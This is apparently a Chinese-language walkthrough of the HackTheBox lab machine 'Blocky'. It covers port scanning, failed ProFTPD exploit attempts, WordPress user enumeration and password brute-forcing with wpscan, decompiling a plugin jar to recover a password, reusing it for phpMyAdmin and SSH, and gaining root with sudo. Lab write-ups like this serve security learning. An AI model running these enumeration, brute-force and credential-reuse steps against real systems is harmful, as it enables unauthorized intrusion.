Blocky(源码泄露、java反编译)

10.10.10.37

1
2
3
4
21/tcp    open  ftp       ProFTPD 1.3.5a
22/tcp    open  ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http      Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open  minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)

21

1
2
3
4
5
6
7
8
ftp 10.10.10.37

searchsploit ProFTPD
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                     | exploits/linux/remote/36803.py

msfconsole
use exploit/unix/ftp/proftpd_modcopy_exec
执行失败

22

1
2
3
4
python ssh.py --userList /usr/share/wordlists/linux-user.txt --outputFile out.txt 10.10.10.37

ssh root@10.10.10.37
ssh_exchange_identification: Connection closed by remote host

ssh禁止过多的连接

80

1
2
3
4
5
6
7
8
9
10
Server: Apache/2.4.18 (Ubuntu)
WordPress version 4.8 

http://10.10.10.37:80
wpscan --url 10.10.10.37 --enumerate p
wpscan --url 10.10.10.37 --enumerate p --enumerate u

searchsploit wordpress Host Header Injection

WordPress 2.3-4.8.3 - Host Header Injection in Password Reset

手动检查了一个wpscan提示的可能漏洞,检查并没有,于是用burp scanner扫描一遍再说。

useful info

1
2
3
4
5
6
phpadmin vesion4.5.4(burp scanner扫描结果)
WordPress/4.8
http://10.10.10.37/phpmyadmin/index.php
http://10.10.10.37/wp-login.php
http://10.10.10.37/wp-links-opml.php
http://10.10.10.37/plugins/

25565

searchsploit Minecraft 经过搜索,好像是一个游戏,“《我的世界》是一款沙盒游戏。。。”

1
2
nc -nv 10.10.10.37 25565
wget http://10.10.10.37:25565

writeup

1
2
3
4
wpscan --url 10.10.10.37 --enumerate
[+] Notch
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

获得一个用户名

  • trying1: 弱口令检查 wpscan –url http://10.10.10.37/wp-login.php –wordlist /usr/share/wordlists/rockyou.txt –username Notch 失败

在plugin目录下下载jar文件,unzip解压,jad反编译,获得一个口令 11

以/root/8YsqfCTnvxAUeduzjNSXe22,登录phpmyadmin成功。

1
2
3
ssh root@10.10.10.37
ssh Notch@10.10.10.37
ssh notch@10.10.10.37,成功

提权:

1
2
3
4
5
6
7
8
9
10
11
12
whoami 以notch普通用户登陆

sudo -l 
响应,说明该用户可以运行任何命令
User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

groups notch 查看该用户所在的组,有sudo组

notch : notch adm cdrom sudo dip plugdev lxd lpadmin sambashare

sudo su

以前用过该方式提权

总结

第一次尝试了java反汇编

wpscan可以使用不带参数的–enumerate,来枚举所有可能漏洞。